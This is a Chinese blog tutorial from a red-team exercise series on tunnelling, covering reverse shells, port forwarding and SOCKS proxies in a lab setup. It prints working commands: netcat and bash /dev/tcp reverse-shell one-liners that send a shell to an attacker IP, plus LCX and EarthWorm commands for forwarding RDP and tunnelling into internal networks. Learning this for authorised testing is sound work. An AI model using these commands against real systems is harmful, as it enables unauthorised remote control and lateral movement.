【网络安全】护网系列-隧道代理

简介: 【网络安全】护网系列-隧道代理

七、隧道代理(红队)

1. 隧道作用

攻击者通过边界主机进入内网,往往会利用它当跳板进行横向渗透

但现在的 内部网络大多部署了很多安全设各,网络结构错综复杂

对于某些系统的访问会受到各种阻挠

这就需要借助代理去突破这些限制

因此面对不同的网络环境对于代理的选择及使用显得格外重要

学校网络拓扑

image-20230723205718897.png

企业网络拓扑

image-20230723205908134.png

2. 隧道基本概念

在隧道中有很多的概念一定要搞明白,不然没有办法学习

常见的有几个概念

1、反弹SHELL 
2、端口转发 
3、正向连接
4、反向连接 
5、协议隧道

2.1 反弹SHELL

反弹Shell是指在攻击机监听某个端口

然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的 Shell。

通常在目标网络有防火墙或其他因素限制
导致无法持续控制目标,或执行命令受阻等情况时
需要进行反弹Shell

image-20230723210318232.png

2.2 端口转发

若攻克的边界主机可访问外网,则可以考虑使用端口转发进行内网穿透

端口转发就是将一个端口转发到另一个端口

例如:由于配置了防火墙只允许web访问,

这个时候攻击者想访问3389端口,远程连接是不可以的

就需要使用进行端口转发

image-20230723210536538.png

2.3 正反向连接

正向连接,反向连接的概念取决于谁主动连接谁

比如如下:

攻击者主动连接受害者,那就是正向连接

正向用于纯内网IP

受害者主动连接攻击者,那就是反向链接

反向居多

2.4 协议隧道

当我们去搭建隧道的时候,通常使用不同的协议来躲避检测

常见的有 HTTP隧道,SOCKS隧道,DNS隧道,ICMP隧道,SSH隧道等等

最常见TCP

根据不同协议划分不同隧道

翻墙原理——建立隧道---网络管理员看的一清二楚

image-20230723211313048.png

暗网原理

VPS从美国访问到欧洲到非洲到网站

原理上可以追踪到,一个一个看日志麻烦

image-20230723211835063.png

3. 反弹SHELL的方式

反弹Shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机 反弹得到目标机的 Shell。

通常在目标网络有防火墙或其他因素限制,导致无法持续控制 目标,或执行命令受阻等情况时需要进行反弹Shell

常见反弹SHELL方式:

1、Bash反弹shel 
2、NC反弹shell
3、python反弹shell 
4、……

3.1 NC反弹SHELL

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。

通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,

常用参数如下

image-20230723212206910.png

3.1.1 正向反弹

实验拓扑如下图

攻击者机器 128 和靶机244 可以相互的访问,这个时候可以使用正向shell

攻击者可以主动连接靶机,攻击者拿到shell

image-20230723212427251.png

1、在靶机上运行:

nc -lvvp 1111 -e C:\Windows\System32\cmd.exe

让其处于监听状态

image-20230723212631476.png

2、在攻击机上运行

IP换成对应靶机IP

nc  192.168.18.244 1111

成功连上

image-20230723212906358.png

3.1.2 反向反弹

实验拓扑如下图

攻击者机器 128不能直接访问靶机,但是靶机可以访问攻击者的机器,这个时候使用反向shell

1、在攻击者机器运行

 nc.exe -lvvp 1111

监听1111端口

image-20230723213117781.png

2、

 nc -e /bin/bash  192.168.1.112 1111

连接成功

image-20230723213230453.png

钓鱼的本质就是反弹

3.2 BASH反弹SHELL

Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell

很多电脑没有NC工具,使用Linux自带的

打开一个交互窗口,把shell发送给攻击IP

bash -i >& /dev/tcp/攻击机_IP/攻击机端口 0>&1 _  (反向连接)

bash -i >& /dev/tcp/攻击机_IP/攻击机端口 0>&2 

bash -i >& /dev/udp/攻击机_IP/攻击机端口 0>&1 _

bash -i >& /dev/udp/攻击机_IP/攻击机端口 0>&2

在windows电脑(攻击者)中打开一个监听端口

1、在攻击者机器运行

nc.exe -lvvp 7788

监听1111端口

image-20230723213814575.png

2、在靶机上运行

bash -i >& /dev/tcp/192.168.1.112/7788 0>&1

image-20230723214008836.png

在攻击者电脑上收到

image-20230723213853665.png

4. 端口转发

LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。

LCX有端口映射和端口转发两大功能,

例如

当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;

当目标处于内网或目标配置的策略只允许访问固定某一端口时 ,可以通过端口转发突破限制端口转发:

 Lcx -listen<监听slave请求的端口><等待连接的端口>
 Lcx -slave<攻击机ip><监听端口><目标ip><目标端口>

在靶机中关闭远程控制电脑的3389端口,攻击者无法直接通过远程控制连接

故端口转发

攻击者电脑执行

把靶机(127.0.0.1)的3389端口转给攻击者(192.168.1.112)的1111端口

 Lcxz转发工具.exe -slave 192.168.1.112 1111 127.0.0.1 3389

image-20230723214631750.png

打开监听端口,在攻击者电脑执行

攻击者电脑上接收到流量后,全部发送给攻击者的2222端口

Lcx -listen 1111 2222

image-20230723215032102.png

连接成功

现在要想访问靶机的3389端口,就要访问本机的2222端口

image-20230723215130004.png

5. 应用层代理

5.1 SOCKS隧道

常见的代理工具有 regeorg,FRP,EW,NPS,Termite,

通过上述的代理,配合代理客户端实现内网漫游

EW全称叫做EarthWorm简称叫做EW,它是一套便携式的网络工具,

具有SOCKS5服务架设和端口转发两大核心功能,并且包含着LCX工具的功能,

可以在复杂的网络环境实现网络穿透

可以已正向和方向以及多级级联的方式建立网络隧道

正向代理

/ew -s ssocksd -l 1080
目录
相关文章
|
运维 监控 安全
【网络安全】护网系列-社工&溯源
【网络安全】护网系列-社工&溯源
1021 0
|
安全 Linux Shell
【网络安全】护网系列-权限维持-Linux权限提升&维持
【网络安全】护网系列-权限维持-Linux权限提升&维持
357 0
|
SQL 安全 网络协议
【网络安全】护网系列-流量分析
【网络安全】护网系列-流量分析
993 1
|
SQL 监控 安全
【网络安全】护网系列-护网安全设备
【网络安全】护网系列-护网安全设备
632 0
|
监控 JavaScript 安全
【网络安全】护网系列-蜜罐&情报搜集
【网络安全】护网系列-蜜罐&情报搜集
976 0
|
安全 关系型数据库 MySQL
【网络安全】护网系列-应急响应排查
【网络安全】护网系列-应急响应排查
537 0
|
安全 Shell 网络安全
【网络安全】护网系列-windows权限维持
【网络安全】护网系列-windows权限维持
184 0
|
SQL 供应链 安全
【网络安全】护网系列-打点技术
【网络安全】护网系列-打点技术
765 0
|
开发框架 安全 前端开发
【网络安全】护网系列-web漏洞(文件上传漏洞、文件包含漏洞)
【网络安全】护网系列-web漏洞(文件上传漏洞、文件包含漏洞)
393 0
|
SQL 存储 安全
【网络安全】护网系列-web漏洞(SQl、RCE、XSS)
【网络安全】护网系列-web漏洞(SQl、RCE、XSS)
499 0